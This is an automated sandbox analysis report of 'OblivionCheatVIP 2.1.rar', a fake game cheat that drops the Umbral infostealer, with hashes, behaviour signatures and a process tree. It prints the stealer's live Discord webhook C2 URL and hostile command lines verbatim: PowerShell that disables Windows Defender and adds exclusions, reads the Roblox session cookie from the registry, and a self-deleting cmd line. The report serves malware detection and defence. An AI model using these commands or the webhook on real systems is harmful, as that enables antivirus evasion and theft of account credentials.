Analysis

  • max time kernel
    122s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
  • submitted
    14-01-2025 21:10

General

  • Target

    OblivionCheatVIP 2.1.rar

  • Size

    45.5MB

  • MD5

    e1bdb1bb87c0e037710f6305c54c969a

  • SHA1

    9b9f9848036fb35395e50b515ed45169d6883436

  • SHA256

    f139ed18bca38e4e61fa88f94f0a070d217df1c1f647191510253352724ea1b5

  • SHA512

    d839d93fbf3547f84ea465f6e9423b5d70b70e840c9f2e0df906cb8f483ea58524c5c79f6badb1f9b2df7a0e7b640904ebca488e36a07dc2dd62edf0f74ccc13

  • SSDEEP

    786432:u5r8IfJQOhn0irjgZzaSiI5RTbhVRaqm9hrb/CU0ItR8uZQouD:gRJhhnPruJXByqgPtR8uSD

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1326623157028913212/jlk5SjJembzYiYsGT0bg_70kMXYfak5GFsTDwPZEZQWRTYI4z_Kz9R6n4WKwU74BXibD

Signatures

  • Detect Umbral payload 2 IoCs
  • Umbral

    Umbral stealer is an open-source modular stealer written in C#.

  • Umbral family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 5 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine the installed video card.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of WriteProcessMemory 59 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\OblivionCheatVIP 2.1.rar"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:532
    • C:\Users\Admin\AppData\Local\Temp\7zO4124E317\OblivionClient.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO4124E317\OblivionClient.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1148
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAYQBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAZgBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHkAYgB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAYgBhACMAPgA="
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1816
      • C:\Users\Admin\AppData\Local\Temp\TestingServer.exe
        "C:\Users\Admin\AppData\Local\Temp\TestingServer.exe"
        3⤵
        • Executes dropped EXE
        PID:2792
      • C:\Users\Admin\AppData\Local\Temp\Node.exe
        "C:\Users\Admin\AppData\Local\Temp\Node.exe"
        3⤵
        • Executes dropped EXE
        PID:3004
      • C:\Users\Admin\AppData\Local\Temp\svchost.exe
        "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3068
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2660
        • C:\Windows\system32\attrib.exe
          "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
          4⤵
          • Views/modifies file attributes
          PID:1956
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\svchost.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1964
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:836
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1960
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2956
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" os get Caption
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1404
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" computersystem get totalphysicalmemory
          4⤵
          PID:2220
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          4⤵
          PID:820
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:1516
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic" path win32_VideoController get name
          4⤵
          • Detects videocard installed
          PID:2108
        • C:\Windows\system32\cmd.exe
          "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\svchost.exe" && pause
          4⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Suspicious use of WriteProcessMemory
          PID:1676
          • C:\Windows\system32\PING.EXE
            ping localhost
            5⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:1648
  • C:\Windows\explorer.exe
    "C:\Windows\explorer.exe"
    1⤵
    PID:1996

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\7zO4124E317\OblivionClient.exe

    Filesize

    41.8MB

    MD5

    95a3e8c1d4a5c7bd87a123b5cccb9f67

    SHA1

    152bca2603e39111cc446692d8a29501d980def9

    SHA256

    aa3765a7cfa4a5430c350c0d44252216c215c3fb3ffdf793cbef71dea633bdd8

    SHA512

    8c9663f0f7700dd71475e9bad481e38a1131c636181ca768c4b9016c5e6e233131a37ab5e100b6c071459ef4ee6a7ace6eb22bd671cf5b0c8ded61e6ac8387d1

  • C:\Users\Admin\AppData\Local\Temp\TestingServer.exe

    Filesize

    3.7MB

    MD5

    54980c00c99dd31da947a704034250e4

    SHA1

    0388dcb527b4df85048593fb1fe324461ac2539b

    SHA256

    efe6e5da039480336cc51d61970eb7ca5b0c10bc315c083f3cd08f81fb5fa7e6

    SHA512

    3e2202658a8a44d994a34dfa5ae2b7de4d539713424f6e9047401847e003df6daf06848c405584e2c0ac7f80c421d708caf0b82f6995e720060a2662c18fd20c

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\40ILQU3WRTHO5V5KALFR.temp

    Filesize

    7KB

    MD5

    df623a2990c1bead9ff6499b13c2e565

    SHA1

    ecfa639f276f0a55a68b55b611469ab79f47047f

    SHA256

    9c9f2c6f82e48559ff69f25f268eb617053a918cda4494debf5ccd01d7bbfd19

    SHA512

    0e01fc3d81e9a39a36aaf93e2759f8fa650b4afeb98ad413f76819cd48a8093c0d54eede8dc0d737ab15846bb03f1f58c90aa42048107668ee05e846f733a541

  • \Users\Admin\AppData\Local\Temp\Node.exe

    Filesize

    37.2MB

    MD5

    0596379d69afdfe2534fad7584914d1f

    SHA1

    34cafd2ac2fb94c4981ef903c974e0f463d0a0e8

    SHA256

    6ae88823ed9ebb76bd63babd61b7dfe6ac9168b2284f32f4b657ebe448b742ca

    SHA512

    17d8ab7db5186d3c77e5ff949bd63bd7b5a31a3891cb757340465ad1df308917c939305218b5448db9f109a61702eb054d6182eecdcba1ba2eb268a10568b932

  • \Users\Admin\AppData\Local\Temp\svchost.exe

    Filesize

    229KB

    MD5

    74a87327b20292e3a514a2edd1f91c2c

    SHA1

    d4a38972946d2a8ce32d375b4781e2f09ecc5368

    SHA256

    7d3e8efdb9cc50120a910f17ed69a6edafd03a6d8ef2765f07e974bab5d6c7a2

    SHA512

    effa857d12d0d955504013525aab1f75bd0e48e958e82b4822ecaab3333176b80c4a107934a11525b791f77f4126cc5db863f841c6cb6c3db3ea679514cb4eec

  • memory/836-44-0x000000001B7A0000-0x000000001BA82000-memory.dmp

    Filesize

    2.9MB

  • memory/836-45-0x0000000001E70000-0x0000000001E78000-memory.dmp

    Filesize

    32KB

  • memory/1964-36-0x000000001B810000-0x000000001BAF2000-memory.dmp

    Filesize

    2.9MB

  • memory/1964-37-0x0000000001FF0000-0x0000000001FF8000-memory.dmp

    Filesize

    32KB

  • memory/3068-31-0x0000000001070000-0x00000000010B0000-memory.dmp

    Filesize

    256KB